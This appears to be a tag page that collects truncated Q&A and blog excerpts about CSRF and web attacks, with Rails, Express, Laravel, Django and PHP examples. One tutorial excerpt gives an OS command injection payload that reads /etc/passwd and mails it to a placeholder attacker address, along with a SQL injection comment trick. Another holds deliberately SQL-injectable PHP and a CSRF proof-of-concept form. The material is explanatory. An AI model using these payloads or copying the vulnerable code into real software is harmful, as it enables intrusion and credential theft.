csrf

Attack Techniques Targeting the Web

孤街醉人 submitted on 2019-12-05 15:08:56
Active attacks: SQL injection attack, OS command injection attack, session hijacking. Passive attacks: XSS attack, CSRF attack, HTTP header injection attack, session fixation attack.
I. Active attacks
1. SQL injection attack. What is SQL? SQL is the database language used to operate relational database management systems; it can be used to manipulate data, define data and so on. What is SQL injection? SQL injection is an attack on the database used by a Web application, carried out by running illegitimate SQL. If there is a flaw in the way SQL statements are invoked, maliciously injected illegitimate SQL statements may be executed. SQL example:
SELECT * FROM bookTb1 WHERE author = '作者'--' and flag = 1
Everything after -- in an SQL statement is treated as a comment, so "and flag = 1" is ignored.
2. OS command injection attack. What is an OS command injection attack? An OS command injection attack achieves its aim by executing illegitimate operating-system commands through the Web application. How is the attack carried out? Operating-system commands can be invoked from a Web application through a shell. If there is a flaw in how the shell is invoked, inserted illegitimate OS commands can be executed. Through OS command injection, any program installed on the OS can be run. Example:
| /usr/sbin/sendmail ; cat /etc/passwd | mail hack@example.jp
The value entered by the attacker (; cat /etc/passwd | mail hack@example.jp) contains a semicolon (;)

Disable CSRF SiteWide

☆樱花仙子☆ submitted on 2019-12-05 14:31:31
Is there a way to disable CSRF for all controllers, or does it have to be disabled on a per-controller basis? I am using ruby on rails as an API only and do not need any sort of CSRF as the requests aren't anywhere near session based. I'd like to disable just for JSON requests. I believe this might work, but am unsure:
class ApplicationController < ActionController::Base
  # Prevent CSRF attacks by raising an exception.
  # For APIs, you may want to use :null_session instead.
  protect_from_forgery
  skip_before_action :verify_authenticity_token, if: :json_request?

  # Checks format for json
  protected
  def

Laravel X-CSRF-Token mismatch with POSTMAN

给你一囗甜甜゛ submitted on 2019-12-05 13:01:01
Question: I try to talk to my REST API built with Laravel. But the call with POSTMAN is rejected due to a token mismatch. I guess I need to include the CSRF token in the header. But do I need the encrypted one? When I insert this token I still get the error that there is a token mismatch. I retrieve my token by using:
$encrypter = app('Illuminate\Encryption\Encrypter');
$encrypted_token = $encrypter->encrypt(csrf_token());
return $encrypted_token;
but is this supposed to change on every refresh?
Answer 1:

A Brief Discussion of Front-End Security

浪尽此生 submitted on 2019-12-05 11:20:28
Classification of security issues. By the area in which they occur: back-end security issues are all security issues that occur in back-end servers, applications and services; front-end security issues are all security issues that occur in the browser, single-page applications and Web pages. By which role on the team is best placed to fix them: back-end security issues are those the back end is best placed to fix; front-end security issues are those the front end is best placed to fix. Combining the above: front-end security issues are security issues that occur in the browser or front-end application, or that are usually fixed by front-end development engineers.
Browser security. The same-origin policy is a convention and the browser's most central and basic security feature; it restricts documents or scripts from a different origin from reading or setting certain properties of the current document. The factors that determine an "origin" are: host (domain name or IP address), subdomain, port and protocol. For the browser, the DOM, cookies and XMLHttpRequest are subject to the same-origin policy. Tags not subject to the same-origin policy: tags such as <script>, <img>, <iframe> and <link> can load resources cross-origin without being restricted by the same-origin policy. Each time one of these tags with a "src" attribute loads, the browser issues a GET request. For resources loaded via the src attribute, the browser restricts JavaScript's privileges so that it cannot read or write the returned content.
The three major front-end security issues. 1. Cross-site scripting (XSS). Definition: the full English name is Cross Site Script; an XSS attack usually means an attacker tampers with a web page through "HTML injection" and inserts malicious scripts

CSRF token not working in nodejs express

大城市里の小女人 submitted on 2019-12-05 10:54:34
Question: I am developing a simple web app using nodejs, express and when I switched to session and csrf, my PUT, DELETE and POST requests are failing with error:
error: Forbidden
at Object.exports.error (appFolder/node_modules/express/node_modules/connect/lib/utils.js:63:13)
at createToken (appFolder/node_modules/express/node_modules/connect/lib/middleware/csrf.js:82:55)
I looked at this line, and found that it calls checkToken function which calls the defaultValue which finds the csrf token in the

Javascript hijacking, when and how much should I worry?

拈花ヽ惹草 submitted on 2019-12-05 10:33:17
Question: Ok, so I'm developing a web app that has begun to be more ajaxified. I then read a blog that talked about javascript hijacking, and I'm a little confused about when it's actually a problem. I want some clarification. Question 1: Is this the problem/vulnerability? If my site returns json data with a 'GET' request that has sensitive information then that information can get into the wrong hands. I use ASP.NET MVC and the method that returns JSON requires you to explicitly allow json get requests

Remove csrf protection on API post calls

谁说胖子不能爱 submitted on 2019-12-05 10:21:30
I would like to remove csrf from my Express 3.0 application as I don't need it there. I use oauth to validate clients. Is there a middleware to whitelist API urls when using express.csrf()? You can do that in two ways. 1.) Create a small middleware of your own to allow white list url patterns not to be blocked by csrf like:
var express = require("express");
var expressCsrf = express.csrf();
var app = express.createServer();
var customCsrf = function (req, res, next) {
  // I assume exact match, but you can use regex match here
  var csrfEnabled = true;
  var whiteList = new Array("/pattern1/param1","

Is the {% csrf_token %} CSRF protection tag still necessary in Django 1.2?

岁酱吖の submitted on 2019-12-05 10:19:14
I am testing the CSRF protection on my site and I have noticed something unexpected. I removed {% csrf_token %} from my form and the submission still works. I couldn't work out why. I then looked at the source and realised the token was still there right next to the <form> element. I changed the ID of the form to make sure it was definitely updating the source and it was, but the hidden input is still there. I am using Django 1.2. Is {% csrf_token %} still necessary? Cheers, Rich
Rich: After more investigation it appears the {% csrf_token %} is always inserted if the form has method post and not

A CSRF example from a post

╄→гoц情女王★ submitted on 2019-12-05 10:05:57
Server side
<?php
$conn = mysqli_connect('localhost', 'root', 'root', 'csrf');
$data = $_POST;
$user = $_POST['username'];
$pass = $_POST['password'];
if (!empty($data)) {
    mysqli_query($conn, "insert into user(`username`,`password`) values('$user','$pass')");
}
?>

<form action="" method="POST">
1<input type="text" name="username"/>
2<input type="text" name="password"/>
<button>提交</button>
</form>
POC
<form action="http://localhost/csrf/csrf.php" method="POST" id="testfrom">
<input type="hidden" name="username"/>
<input type="hidden" name="password"/>
</form>
<script>
var

Django POST requests

末鹿安然 submitted on 2019-12-05 09:48:46
When submitting a POST request in Django, the CSRF token must be sent along, otherwise a 403 error is returned. In that case add {% csrf_token %} to the form, or comment out 'django.middleware.csrf.CsrfViewMiddleware' under settings.py -> MIDDLEWARE, but the latter is strongly discouraged! When sending an asynchronous POST request with ajax, the token also needs to be added to data. Add it to data in one of two ways:
1. var csrf = $('input[name="csrfmiddlewaretoken"]').val(); data: {'csrfmiddlewaretoken': csrf}
2. data: {'csrfmiddlewaretoken': "{{ csrf_token }}"}
Example, personally tested and working:
<script>
$(function () {
  // GET request
  $('#h1').click(function () {
    $.ajax({
      url: "{% url 'index:ajg' %}",
      success: function (res) {
        alert(res)
      }
    })
  });
  $('#h2').click(function () {
    var csrf = $('input[name="csrfmiddlewaretoken"]').val();
    // POST request
    $.ajax({
      url: "{% url